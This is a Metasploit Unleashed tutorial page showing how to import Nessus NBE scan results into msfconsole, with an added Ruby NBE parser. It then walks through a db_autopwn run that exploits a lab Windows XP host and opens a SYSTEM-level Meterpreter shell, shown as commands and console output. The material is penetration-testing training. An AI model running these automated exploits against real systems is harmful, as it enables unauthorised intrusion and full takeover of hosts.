Working With Nessus

From Metasploit Unleashed

Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use. It was first released in 1998 by Renaud Deraison and is currently published by Tenable Network Security. There is also a spin-off of Nessus 2, named OpenVAS, that is published under the GPL. Using a large number of vulnerability checks, called plugins in Nessus, you can identify a large number of well-known vulnerabilities. Metasploit will accept vulnerability scan result files from both Nessus and OpenVAS in the nbe file format.

Let's walk through the process. First we complete a scan from Nessus 4:

[Image: Nessus.png, the completed Nessus 4 scan]

Upon completion of a vulnerability scan, we save the results in nbe format and then start the msfconsole. Next, we need to create a new database to read the results file into.

root@bt:/pentest/exploits/framework3# ./msfconsole

...
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load db_tracker
[*] Successfully loaded plugin: db_tracker
msf >

We have now created the database. Next, let's take a look at the 'help' command, which presents many more options.

msf > help

...snip...

Database Backend Commands
=========================

    Command               Description
    -------               -----------
    db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database
    db_create             Create a brand new database
    db_del_host           Delete one or more hosts from the database
    db_del_port           Delete one port from the database
    db_destroy            Drop an existing database
    db_disconnect         Disconnect from the current database instance
    db_driver             Specify a database driver
    db_hosts              List all hosts in the database
    db_import_amap_mlog   Import a THC-Amap scan results file (-o -m)
    db_import_nessus_nbe  Import a Nessus scan result file (NBE)
    db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
    db_import_nmap_xml    Import a Nmap scan results file (-oX)
    db_nmap               Executes nmap and records the output automatically
    db_notes              List all notes in the database
    db_services           List all services in the database
    db_vulns              List all vulnerabilities in the database

msf >

So let's go ahead and import the nbe results file by issuing the 'db_import_nessus_nbe' command followed by the path to our results file. After importing the results file, we can execute the 'hosts' command to list the hosts that are in the nbe results file.

msf > db_import_nessus_nbe /root/docs/115_scan.nbe
msf > hosts
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Host: 192.168.1.115 Status: alive OS:

We see exactly what we were expecting to see. Next we execute the 'services' command which will enumerate all of the services that were detected running on the scanned system.

msf > services
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=135 proto=tcp state=up name=epmap
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=22 proto=tcp state=up name=ssh
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=137 proto=udp state=up name=netbios-ns
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Service: host=192.168.1.115 port=123 proto=udp state=up name=ntp

Finally, and most importantly, the 'vulns' command will list all of the vulnerabilities that were reported by Nessus and recorded in the results file.

msf > vulns
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=22 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.50282 refs=NSS-1.3.6.1.4.1.25623.1.0.50282
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=139 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.11011 refs=NSS-1.3.6.1.4.1.25623.1.0.11011
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=137 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10150 refs=NSS-1.3.6.1.4.1.25623.1.0.10150,CVE-1999-0621
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=445 proto=tcp name=NSS-1.3.6.1.4.1.25623.1.0.10394 refs=NSS-1.3.6.1.4.1.25623.1.0.10394
[*] Time: Tue Jul 14 17:40:23 -0600 2009 Vuln: host=192.168.1.115 port=123 proto=udp name=NSS-1.3.6.1.4.1.25623.1.0.10884 refs=NSS-1.3.6.1.4.1.25623.1.0.10884
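
As an added example (not Metasploit's own import code), here is a small Ruby parser for the 'results' records of the NBE format that rebuilds the hosts, services and vulns tables shown above, including the NSS- plugin reference and any CVE identifier pulled from the finding's description. The NBE lines it reads are constructed for illustration, with OpenVAS-style OID plugin IDs like those in the output above.

```ruby
# Constructed NBE sample: pipe-delimited records of the form
#   results|subnet|host|service (port/proto)|pluginID|severity|description
# Newlines inside the description are stored as a literal backslash-n.
NBE_SAMPLE = <<~NBE
  timestamps|||scan_start|Tue Jul 14 17:40:23 2009|
  timestamps||192.168.1.115|host_start|Tue Jul 14 17:40:23 2009|
  results|192.168.1|192.168.1.115|general/tcp|0|Security Note|Host is up.
  results|192.168.1|192.168.1.115|ssh (22/tcp)|1.3.6.1.4.1.25623.1.0.50282|Security Note|An SSH server is listening.
  results|192.168.1|192.168.1.115|netbios-ns (137/udp)|1.3.6.1.4.1.25623.1.0.10150|Security Warning|NetBIOS name leak.\\n\\nCVE : CVE-1999-0621
  results|192.168.1|192.168.1.115|microsoft-ds (445/tcp)|1.3.6.1.4.1.25623.1.0.11011|Security Note|SMB service detected.
  timestamps||192.168.1.115|host_end|Tue Jul 14 17:40:50 2009|
NBE

SERVICE_RE = /\A(?<name>[\w-]+) \((?<port>\d+)\/(?<proto>tcp|udp)\)\z/
CVE_RE     = /CVE-\d{4}-\d{4,}/

# Returns { hosts: [...], services: [...], vulns: [...] }, one Hash per entry.
def parse_nbe(text)
  hosts, services, vulns = [], [], []
  text.each_line do |line|
    fields = line.chomp.split('|', -1)
    next unless fields[0] == 'results' && fields.length >= 7
    host, svc, plugin, severity = fields[2], fields[3], fields[4], fields[5]
    desc = fields[6..-1].join('|')          # description may itself contain '|'
    hosts << host unless hosts.include?(host)
    m = SERVICE_RE.match(svc)
    next unless m                            # "general/tcp": host-level note, no service
    port, proto = m[:port].to_i, m[:proto]
    entry = { host: host, port: port, proto: proto, name: m[:name] }
    services << entry unless services.include?(entry)
    next if plugin.empty? || plugin == '0'  # plugin 0 is port-scanner output, not a finding
    refs = ["NSS-#{plugin}"] + desc.scan(CVE_RE).uniq
    vulns << { host: host, port: port, proto: proto, name: "NSS-#{plugin}",
               severity: severity, refs: refs }
  end
  { hosts: hosts, services: services, vulns: vulns }
end

if __FILE__ == $0
  r = parse_nbe(NBE_SAMPLE)
  r[:services].each { |s| puts "Service: host=#{s[:host]} port=#{s[:port]} proto=#{s[:proto]} name=#{s[:name]}" }
  r[:vulns].each    { |v| puts "Vuln: host=#{v[:host]} port=#{v[:port]} proto=#{v[:proto]} name=#{v[:name]} refs=#{v[:refs].join(',')}" }
end
```

Findings are keyed on plugin ID and port, so the same plugin reported on ports 139 and 445 yields two vuln rows, exactly as in the 'vulns' output above.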

All of this enumeration and parsing is leading up to something...db_autopwn. db_autopwn will read all of the ports, services, and vulnerabilities contained within the nbe results file, match exploits that are compatible with them, and try to exploit them all automagically. Running 'db_autopwn -h' will list all of the options that are available.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex

We will run 'db_autopwn -x -e' to select exploit modules based on vulnerability (instead of just by port as would happen with just nmap results) and exploit all targets. db_autopwn is not a stealthy tool by any means and by default, uses a reverse Meterpreter shell. Let's see what happens when we run it.

msf > db_autopwn -x -e
[*] (8/38): Launching exploit/multi/samba/nttrans against 192.168.1.115:139...
[*] (9/38): Launching exploit/windows/smb/psexec against 192.168.1.115:445...
[*] (10/38): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.115:445...

[-] Exploit failed: The connection was refused by the remote host (192.168.1.115:22).
[*] (35/38): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.115:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
msf >
[*] Binding to 3d742890-397c-11cf-9bf1-00805f88cb72:1.0@ncacn_np:192.168.1.115[alert] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.115[lsarpc]...
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:40814 -> 192.168.1.115:14198)

Very nice! db_autopwn has successfully exploited the host and has a Meterpreter shell waiting for us. The 'sessions -l' command will list the open sessions available, while 'sessions -i ' followed by a session ID will allow us to interact with that session.

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1  Meterpreter 192.168.1.101:40814 -> 192.168.1.115:14198

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: DOOKIE-FA154354
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

As you can see, this is a very powerful feature. It won't catch everything on the remote system, and will be very noisy, but there is a time and place for noise the same as there is for stealth. This demonstrates the versatility of the framework and some of the many possibilities for integration with other tools.
